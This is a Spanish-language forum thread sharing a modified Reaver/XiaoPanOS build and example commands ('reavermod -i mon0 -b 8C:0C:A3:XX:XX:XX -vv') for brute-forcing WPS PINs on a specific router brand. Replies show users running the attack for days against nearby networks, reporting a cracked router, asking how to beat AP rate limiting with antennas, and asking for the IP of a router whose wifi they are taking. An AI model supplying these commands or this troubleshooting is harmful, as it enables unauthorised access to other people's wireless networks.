PadreDeFamilia

QVIART DUAL : SATELITE 4K ANDROID 9.0 DVB-S2X+DVB-T2+DVB-C+IPTV

Chincheta Autor Tema: Xiaopan DualReaver - Modificado para BBSID 8C:0C:A3 - SSID WLAN_ABCD y salvar s  (Leído 109818 veces)

Registrado:
30/04/2010
Gracias:
298/266
Mensajes
703
Actualizado 13-12-2012


Usando reavermod desde Inflator 1.0 con DualReaver:
[/b]




Usando reaver y reavermod desde el Shell con DualReaver:
[/b]

Resultado usando reavermod desde el shell:


Para no perder la sesion si apagamos el ordenador, tendremos que guardar el archivo .wpc dentro de un Pen. Si queremos restaurar la sesion al iniciar de nuevo el equipo, tendremos que volver a copiarlo dentro de la misma carpeta:


Descarga XiaoPanOS 0.4.1 DualReaver - Reaver 1.4 + Reaver 1.4 REPACK v2
XiaoPan 0.4.1-DualReaver.rar




Comandos recomendados de ejemplo para Reaver 1.4 Original

reaver -i mon0 -b 11:22:33:44:55:66 -vv (Ataque desde el principio sin conocer ningun digito del PIN)
reaver -i mon0 -b 11:22:33:44:55:66 -p 1234 -vv (Ataque conociendo los cuatro primeros digitos del PIN)
Para salvar la sesion pulsamos CTRL+C el archivo se guardara en: usr/local/etc/reaver/

Comandos recomendados de ejemplo para Reaver 1.4 Modificado Repack v2

reavermod -i mon0 -b 8C:0C:A3:XX:XX:XX -vv (Ataque desde el principio sin conocer ningun digito del PIN)
reavermod -i mon0 -b 8C:0C:A3:XX:XX:XX -p 1234 -vv (Ataque conociendo los cuatro primeros digitos del PIN)
Para salvar la sesion pulsamos CTRL+C el archivo se guardara en: usr/local/etc/reavermod/

Para restaurar la sesion no es necesario la opcion -p

reavermod -i mon0 -b 8C:0C:A3:XX:XX:XX -vv(simplemente volver a arrancar inflator)

Gracias a notepad
Registrado:
28/02/2009
Gracias:
12569/104901
Mensajes
66924
si señor,,muy buena herramienta y tutorial

gracias


fijado con chincheta
Registrado:
13/01/2013
Gracias:
0/0
Mensajes
2
Muy buen trabajo, gracias.
Registrado:
02/03/2013
Gracias:
0/0
Mensajes
6
Compañeros, ya me presenté y os saludé.
Ahora voy con una pregunta relativa a este tema.
He puesto en marcha el xiaopan con reaver dual y metí el comando señalado para empezar desde cero, cuando llegó al 20% aproximadamente (solo metía nuevos pins correspondiente a las primeras cuatro cifras), me apareció el siguiente texto: "Switching mon0 to channel 7.....hasta el channel 14) y se quedó parado sin avanzar nada mas.
Pulsé control+C y guardé lo hecho hasta ese momento, que significa esto que ha salido??.
Algún entendido me puede explicar que pasó? ha habido un error y habría que empezar de nuevo?
Gracias anticipadas y perdonen si debo hacer algo antes de consultar.
Registrado:
02/03/2013
Gracias:
0/0
Mensajes
6
Volviendo con este tema. He vuelto a correr el reaver dual (de notepad) con el comando correspondiente y lleva dos dias y medio rulando, ahora me tira los M1, M2, M3, M4, M5 y M6. ?Quiere esto decir que llegará a su fin y terminará dando los resultados?
Registrado:
30/04/2010
Gracias:
298/266
Mensajes
703
tarda normalmente 4 o 5 días dandole q te pego sin parar.Yo las q he sacado lo dejaba por las noches y luego lo paraba y guardaba.Ten paciencia q todo llega a su fin.Salu2.
Registrado:
28/02/2009
Gracias:
12569/104901
Mensajes
66924
cuando llegó al 20% aproximadamente (solo metía nuevos pins correspondiente a las primeras cuatro cifras), me apareció el siguiente texto: "Switching mon0 to channel 7.....hasta el channel 14) y se quedó parado sin avanzar nada mas.
Pulsé control+C y guardé lo hecho hasta ese momento, que significa esto que ha salido??.
Algún entendido me puede explicar que pasó? ha habido un error y habría que empezar de nuevo?

puede ser q desconectaran el router "con el q estabas trabajando"

yo con el reaver he sacado bastantes,,pero tarda bastante,,una media de 2 dias

si vas por el M6,,ya le queda poco,,la ultima es el M7(por lo menos con wifiway y reaver)
Registrado:
02/03/2013
Gracias:
0/0
Mensajes
6
Perfecto el reaver dual de notepad.
Conseguido una mac 8c:0c:a3 en 14.260 pines enviados entre los dos módulos (4 primeros digitos y cuatro últimos) a una media de un pin/14 segundos..........averigüar el tiempo que ha tardado.
Yo no puedo felicitar a notepad porque no me dejan registrarme en lampiweb (parece que esta cerrado el registro), los que podais felicitarlo, hacedlo.
Gracias.
« Última modificación: 22/03/2013, 15:34 por JJDV »
Registrado:
27/08/2014
Gracias:
2/6
Mensajes
49
perdonad soy nuevo y haber si me podeis ayudar con este programa salta la seguridad que sale detecte ap rate limiting waiting 60 seconds.gracias un saludo
Registrado:
30/04/2010
Gracias:
298/266
Mensajes
703
perdonad soy nuevo y haber si me podeis ayudar con este programa salta la seguridad que sale detecte ap rate limiting waiting 60 seconds.gracias un saludo

o te llega poca señal o tiene el wps desactivado.De todas formas usa wifislax está mucho más actualizado que el xiopan.Suerte y un saludo.
Registrado:
27/08/2014
Gracias:
2/6
Mensajes
49
me llega poca señal con el wifi como podria aumentarla con una parabolica y una alfa que tengo
Registrado:
30/04/2010
Gracias:
298/266
Mensajes
703
me llega poca señal con el wifi como podria aumentarla con una parabolica y una alfa que tengo

poca cosa más puedes hacer.
Registrado:
24/10/2009
Gracias:
6/1
Mensajes
44
poca cosa más puedes hacer.

Pues sí, con parábola y alfa.... como no te acerques... no se me ocurren más cosas  :-\
Registrado:
27/08/2014
Gracias:
2/6
Mensajes
49
gracias a otra cosita haber si me podeis ayudar como puedo saber la direccion ip del router al que le estoy cojiendo la wifi es un wlan c3 para ser exasto
Registrado:
28/02/2009
Gracias:
12569/104901
Mensajes
66924
gracias a otra cosita haber si me podeis ayudar como puedo saber la direccion ip del router al que le estoy cojiendo la wifi es un wlan c3 para ser exasto

con cualquier programa q te escanee,las redes wifi a tu alcance ,,por ej este

http://www.forokeys.com/foro/redes-wireless/wpa_key_v2-0/

QVIART DUAL : SATELITE 4K ANDROID 9.0 DVB-S2X+DVB-T2+DVB-C+IPTV

 

GoogleTagged





PadreDeFamilia
!! ADVERTENCIAS !!: Las informaciones aquí publicadas NO CONTIENEN KEYS para la decodificación de ningún sistema: NO SON OPERATIVOS en sistemas SAT que precisen de su correspondiente suscripción. ESTA TOTALMENTE PROHIBIDO EL USO DE ESTAS INFORMACIONES PARA LA MODIFICACIÓN O DEFRAUDACIÓN DE SISTEMAS DE ACCESO CONDICIONAL. EN ESTOS FOROS NO SE PERMITE LA PUBLICACIÓN DE INFORMACIONES ILEGALES POR PARTE DE LOS USUARIOS. EN CASO DE DETECTARSE ESTE TIPO DE INFORMACIONES, LOS USUARIOS SERÁN EXCLUIDOS DE ESTAS PÁGINAS.
PROHIBIDA LA PUBLICACIÓN DE ENLACES A FIRMWARES ILEGALES
LOS FOROS NO SON MONITORIZADOS DE MANERA CONSTANTE, CUALQUIER INFORMACIÓN QUE PUEDAS CONSIDERAR ILEGAL REPORTALA A LA ADMINISTACIÓN DEL FORO